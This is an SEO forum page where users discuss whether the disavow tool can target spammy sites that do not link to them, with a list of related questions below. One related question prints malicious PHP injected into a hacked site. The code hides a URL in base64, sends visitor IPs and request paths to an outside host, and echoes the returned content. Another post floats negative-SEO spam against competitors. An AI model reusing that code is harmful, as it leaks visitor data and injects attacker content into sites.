Can you disavow a spamy link that is not pointing to your website?
-
We have submitted several really spammy websites to the Google spam team. We noticed they take a very long time to react to submissions. Do you know if it is possible to disavow a link that is not pointing to your website but rather to a very spammy website?
Thanks
-
Hi Marie,
You are absolutely correct. I was confused. Thanks for clearing that up for me.
Carla
-
You may be confused about what the disavow tool does. Sure, you can put any site in your disavow file. You're basically telling Google that if they crawl that site and find a link on it that is pointing to yours to not pass any Pagerank through the link. Google has said several times that they do not use disavow info against the disavowed sites. It is not a spam report.
-
Hi Jessy,
Well I am glad to see that I am not the only person with the same issue. I really delayed the whole submitting my competitors to Google spam but they continue to use black hat techniques. I will let you know if it works.
Thanks
Carla
-
Yes Carla it does make sense and thank you for the explanation.
I too am working in an industry where all of my competitors who outrank me are using blackhat tactics and they haven't been penalized for it at all. It's quite frustrating and I'd be lying if I hadn't considered submitting them to the Webspam team. However I worry that this will somehow come back to bite us later on so I haven't done so and probably never will. Instead I continue building quality content and trying to organically build authority.
That all said, I'd love it if you kept us posted. I'd really like to know how this all works out for you. Even though you are in another country, it might be a great indicator of the potential problems/benefits to this tactic.
Thanks
-
Hi Jesse and Tuzzell,
We have several competitors that use constant black hat techniques. They have been doing this for over 2 years and for some reason the Google Algorithm updates are not taking effect. We have stuck to white hat techniques but are getting a bit impatient. For over 2 years our black hat competitors continue to outrank us. We waited 2 years before submitting them to Google Spam and the only reason we did it was because they have not stopped using black hat techniques. It's a bit frustrating. We are not going on a spam crusade...its more like helping Google do their job and testing the Argentina Google Spam team and learning more about SEO. BTW, we also submitted ourselves to the Google Spam Team about 2 years back to see if our links were in line with Google's policies.
Hope it makes sense...
Carla
-
I can't wrap my head around why you would want to do this and what you seek to gain from it..?
Tuzzell is right, the answer is no.. but I absolutely am dying to know why you are leading the Spam Crusade? (I'm not against it.. nor am I for it.. I'm totally neutral so far just curious why)
-
Short answer no.
To use the disavow tool you need to be logged into webmaster tools, and you need to use the disavow tool under the profile of the relavent site. As such Google will know that any links you are trying to disavow are associated with, and only authorised for, the site you have signed in under.
Browse Questions
Explore more categories
-
Moz Tools
Chat with the community about the Moz tools.
-
SEO Tactics
Discuss the SEO process with fellow marketers
-
Community
Discuss industry events, jobs, and news!
-
Digital Marketing
Chat about tactics outside of SEO
-
Research & Trends
Dive into research and trends in the search industry.
-
Support
Connect on product support and feature requests.
Related Questions
-
Link Building vs. Straight Earning Links Discussion
Hello, I'd like to start a discussion on link building outreach techniques vs. just building a good website with good 10X content. I don't like to receive unsolicited emails in my inbox, so why should the people in my industry? Also, I've seen plenty of evidence of 10X content soaring without link building outreach. But link building isn't dead of course, so can you tell me your personal experiences either way and the ethics of what you do? I especially want to hear if you've had luck with just building good websites and being successful based on the content itself, but an open discussion of either side is welcome. Leaning towards just building good websites and letting the Google algo do it's thing. Would love to hear your experiences either way. Thanks.
White Hat / Black Hat SEO | | BobGW3 -
Is it Okay to Nofollow all External Links
So, we all "nofollow" most of the external links or all external links to hold back the page rank. Is it correct? As per Google, only non-trusty and paid links must be nofollow. Is it all same about external links and nofollow now?
White Hat / Black Hat SEO | | vtmoz0 -
Would it be a good idea to duplicate a website?
Hello, here is the situation: let's say we have a website www.company1.com which is 1 of 3 main online stores catering to a specific market. In an attempt to capture a larger market share, we are considering opening a second website, say www.company2.com. Both these websites have a different URL, but offer the same products for sale to the same clientele. With this second website, the theory is instead of operating 1 of 3 stores, we now operate 2 of 4. We see 2 ways of doing this: we launch www.company2.com as a copy of www.company1.com. we launch www.company2.com as a completely different website. The problem I see with either of these approaches is duplicate content. I think the duplicate content issue would be even more or a problem with the first approach where the entire site is mostly a duplicate. With the second approach, I think the duplicate content issue can be worked around by having completely different product pages and overall website structure. Do you think either of these approaches could result in penalties by the search engines? Furthermore, we all know that higher ranking/increased traffic can be achieved though high quality unique content, social media presence, on-going link-building and so on. Now assuming we have a fixed amount of manpower to provide for these tasks; do you think we have better odds of increasing our overall traffic by sharing the manpower on 2 websites, or putting it all behind a single one? Thanks for your help!
White Hat / Black Hat SEO | | yacpro130 -
How can we compete ???
Hi Guys, We are new to MOZ and just getting some data on one of our projects Shottle Hall This is a wedding venue in Derbyshire and as you can imagine it's quite a competitive niche. We have been working with them to help build website content and build natural links. However we are against a lot of sites that have obviously had lots of "questionable" SEO work done in the past and these sites are still ranking above Shottle Hall One competitor has lots of links from very low quality blogs - that they have obviously made themselves http://derbyshire-attractions.blogspot.co.uk/ Another site is ranking well and is buying banner links that pass page rank http://whimsicalwonderlandweddings.com/ This really makes me think should we be doing these tactics ?? We are told by Google that this is not the way to rank but I am very disheartened by these facts!!
White Hat / Black Hat SEO | | BlueNinja0 -
Website has been hacked will this hurt ranking
Today we found out that a website of as has been hacked and that they put this code in multiple index.php files: if (!isset($sRetry))
White Hat / Black Hat SEO | | GTGshops
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?> After some search I found other people mentioning this problem too.They were also talking about that this could have impact on your search rankings. My first question : Will this hurt my rankings ? Second question: Is there something I can do to tell the search engines about the hack so that we don't lose ranking on this. Grtz, Ard0 -
Can anyone explain these crazy SERPS?
do a UK based search for 'short term loans' on google. there are 7 sites on page 1 without any page or domain authority, several of them registered to a 'jeremy hughes', who I am guessing does not really exist. this is a very competitive term and they just shouldn't be making it onto page 1. im thinking this must be some clever 301 redirecting, as I cant see any backlinks to any of these sites in opensiteexplorer. any ideas how these sites are pulling this off?
White Hat / Black Hat SEO | | lethal0r0 -
How fast should I make links
I have an eCommerce site. I like to review 100 of my products on Squidoo. There will be 50 lenses each lens will review 2-4 products. Each lens will link to each product review and one link to website URL. at the end of the project I would make around 200-250 links to my site. How should I extent the work. Should I do it within a month? of course I will do my other link buildings along with this task Thanks
White Hat / Black Hat SEO | | giftbasket4kids0 -
Competitors Developing Spammy Link For My Website
Well Guys there are lot of discussions in almost all the communities, blogs, forums about Post Penguin impact. Google says that if find that you're involved in any link building activities, we may penalize you. People out there have already started their developed links. But what if our competitors would have developed those links. Initially it was okay to develop one way links, I even developed lot of quality, but deliberately, links. around 95% links are placed manually, if return to some favor or money but all links looks natural. Most of the links I developed through content only, like articles, blog comments, PR submission, etc now really skeptical about the quality (after hearing lot of talks and reading n number of posts). Now, can I also submit my competitor's websites in 1000 topic directory (obviously not in any spammy directory), would it effect that website adversely? What if I spun an existing content and submit it into 500 article directories and give backlink to competitor site from using only one anchor text (which is obviously the main keywords - highest sales generating keyword) I look forward to some experts comments.
White Hat / Black Hat SEO | | Khem_Raj70